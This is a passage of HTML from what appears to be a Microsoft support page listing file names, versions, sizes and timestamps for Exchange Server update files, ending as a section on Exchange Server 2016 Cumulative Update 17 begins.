-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.logging.search.dll</td><td>15.2.595.6</td><td>68,488</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.loggingcommon.dll</td><td>15.2.595.6</td><td>63,368</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.monitoring.dll</td><td>15.2.595.6</td><td>430,472</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.net.dll</td><td>15.2.595.6</td><td>122,240</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.protocols.contracts.dll</td><td>15.2.595.6</td><td>17,792</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.protocols.dll</td><td>15.2.595.6</td><td>29,064</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.protocols.httpsubmission.dll</td><td>15.2.595.6</td><td>60,800</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.requestbroker.dll</td><td>15.2.595.6</td><td>50,056</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.scheduler.contracts.dll</td><td>15.2.595.6</td><td>33,144</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.scheduler.dll</td><td>15.2.595.6</td><td>113,032</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.smtpshared.dll</td><td>15.2.595.6</td><td>18,312</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.storage.contracts.dll</td><td>15.2.595.6</td><td>52,088</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.storage.dll</td><td>15.2.595.6</td><td>675,208</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.storage.management.dll</td><td>15.2.595.6</td><t
d>23,944</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.agents.dll</td><td>15.2.595.6</td><td>17,792</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.common.dll</td><td>15.2.595.6</td><td>487,296</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.common.eventlog.dll</td><td>15.2.595.6</td><td>12,680</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.sync.manager.dll</td><td>15.2.595.6</td><td>306,048</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.manager.eventlog.dll</td><td>15.2.595.6</td><td>15,744</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.sync.migrationrpc.dll</td><td>15.2.595.6</td><td>46,464</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.worker.dll</td><td>15.2.595.6</td><td>1,044,360</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.worker.eventlog.dll</td><td>15.2.595.6</td><td>15,240</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.transportlogsearch.eventlog.dll</td><td>15.2.595.6</td><td>18,816</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.transportsyncmanagersvc.exe</td><td>15.2.595.6</td><td>18,824</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.troubleshootingtool.shared.dll</td><td>15.2.595.6</td><td>118,656</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.umcommon.dll</td><td>15.2.595.6</td><td>924,552</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.umcore.dll</td><td>15.2.595.6</td><td>1,466,248</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.umvariantconfiguratio
n.dll</td><td>15.2.595.6</td><td>32,648</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedcontent.dll</td><td>15.2.595.6</td><td>41,856</td><td>12-Aug-2020</td><td>20:43</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedcontent.exchange.dll</td><td>15.2.595.6</td><td>24,960</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedpolicyfilesync.eventlog.dll</td><td>15.2.595.6</td><td>15,232</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.unifiedpolicyfilesyncservicelet.dll</td><td>15.2.595.6</td><td>83,328</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedpolicysyncservicelet.dll</td><td>15.2.595.6</td><td>50,048</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.antispam.dll</td><td>15.2.595.6</td><td>642,440</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.core.dll</td><td>15.2.595.6</td><td>186,232</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.dll</td><td>15.2.595.6</td><td>67,464</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.eventlog.dll</td><td>15.2.595.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.exchange.variantconfiguration.excore.dll</td><td>15.2.595.6</td><td>56,704</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.globalsettings.dll</td><td>15.2.595.6</td><td>27,528</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.hygiene.dll</td><td>15.2.595.6</td><td>120,712</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.protectionservice.dll</td><td>15.2.595.6</td><td>31,624</td><td>12-Aug-2020</td><td>
20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.threatintel.dll</td><td>15.2.595.6</td><td>57,224</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.webservices.auth.dll</td><td>15.2.595.6</td><td>35,712</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.webservices.dll</td><td>15.2.595.6</td><td>1,054,080</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.webservices.xrm.dll</td><td>15.2.595.6</td><td>67,976</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.wlmservicelet.dll</td><td>15.2.595.6</td><td>23,424</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.wopiclient.dll</td><td>15.2.595.6</td><td>77,192</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.workingset.signalapi.dll</td><td>15.2.595.6</td><td>17,288</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.workingsetabstraction.signalapiabstraction.dll</td><td>15.2.595.6</td><td>29,064</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.workloadmanagement.dll</td><td>15.2.595.6</td><td>505,216</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.workloadmanagement.eventlogs.dll</td><td>15.2.595.6</td><td>14,720</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.workloadmanagement.throttling.configuration.dll</td><td>15.2.595.6</td><td>36,744</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.workloadmanagement.throttling.dll</td><td>15.2.595.6</td><td>66,432</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.fast.contextlogger.json.dll</td><td>15.2.595.6</td><td>19,328</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.filtering.dll</td><td>15.2.595.6</td><td>113,016</td><td>12-Aug-2020</td><td>20:43</td>
<td>x86</td></tr><tr><td>Microsoft.filtering.exchange.dll</td><td>15.2.595.6</td><td>57,224</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.filtering.interop.dll</td><td>15.2.595.6</td><td>15,232</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.forefront.activedirectoryconnector.dll</td><td>15.2.595.6</td><td>46,984</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.forefront.activedirectoryconnector.eventlog.dll</td><td>15.2.595.6</td><td>15,744</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.forefront.filtering.common.dll</td><td>15.2.595.6</td><td>23,936</td><td>12-Aug-2020</td><td>20:43</td><td>x86</td></tr><tr><td>Microsoft.forefront.filtering.diagnostics.dll</td><td>15.2.595.6</td><td>22,400</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.forefront.filtering.eventpublisher.dll</td><td>15.2.595.6</td><td>34,688</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.forefront.management.powershell.format.ps1xml</td><td>Not applicable</td><td>48,902</td><td>12-Aug-2020</td><td>20:45</td><td>Not applicable</td></tr><tr><td>Microsoft.forefront.management.powershell.types.ps1xml</td><td>Not applicable</td><td>16,278</td><td>12-Aug-2020</td><td>20:45</td><td>Not 
applicable</td></tr><tr><td>Microsoft.forefront.monitoring.activemonitoring.local.components.dll</td><td>15.2.595.6</td><td>1,517,960</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.forefront.monitoring.activemonitoring.local.components.messages.dll</td><td>15.2.595.6</td><td>13,192</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.forefront.monitoring.management.outsidein.dll</td><td>15.2.595.6</td><td>33,144</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.forefront.recoveryactionarbiter.contract.dll</td><td>15.2.595.6</td><td>18,304</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.forefront.reporting.common.dll</td><td>15.2.595.6</td><td>46,472</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.forefront.reporting.ondemandquery.dll</td><td>15.2.595.6</td><td>50,568</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.isam.esent.collections.dll</td><td>15.2.595.6</td><td>72,576</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.isam.esent.interop.dll</td><td>15.2.595.6</td><td>541,576</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.managementgui.dll</td><td>15.2.595.6</td><td>133,504</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.mce.interop.dll</td><td>15.2.595.6</td><td>24,448</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.office.audit.dll</td><td>15.2.595.6</td><td>124,792</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.office.client.discovery.unifiedexport.dll</td><td>15.2.595.6</td><td>593,288</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.office.common.ipcommonlogger.dll</td><td>15.2.595.6</td><td>42,368</td><td>12-Aug-2020</td><td>20:43</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.console.core.dll</td><td>15.2.595.6</td><td>217,984</td><td>12-Aug-2020</td><td>20:
42</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.console.dll</td><td>15.2.595.6</td><td>854,912</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.console.extensions.dll</td><td>15.2.595.6</td><td>485,760</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.core.dll</td><td>15.2.595.6</td><td>413,056</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.ingestion.dll</td><td>15.2.595.6</td><td>36,224</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.office.compliancepolicy.exchange.dar.dll</td><td>15.2.595.6</td><td>84,872</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.office.compliancepolicy.platform.dll</td><td>15.2.595.6</td><td>1,782,152</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.office.datacenter.activemonitoring.management.common.dll</td><td>15.2.595.6</td><td>49,536</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.office.datacenter.activemonitoring.management.dll</td><td>15.2.595.6</td><td>27,528</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.office.datacenter.activemonitoringlocal.dll</td><td>15.2.595.6</td><td>174,968</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.office.datacenter.monitoring.activemonitoring.recovery.dll</td><td>15.2.595.6</td><td>166,272</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.office365.datainsights.uploader.dll</td><td>15.2.595.6</td><td>40,320</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.online.box.shell.dll</td><td>15.2.595.6</td><td>46,464</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.powershell.hostingtools.dll</td><td>15.2.595.6</td><td>67,968</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.powershell.hostingtools_2.dll</td><td>15.2.595.6</td><td
>67,968</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr></tbody></table></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span 
class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\">Exchange Server 2016 Cumulative Update 17</span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th><th>Platform</th></tr><tr><td>Dsaccessperf.dll</td><td>15.1.2044.6</td><td>45,952</td><td>12-Aug-2020</td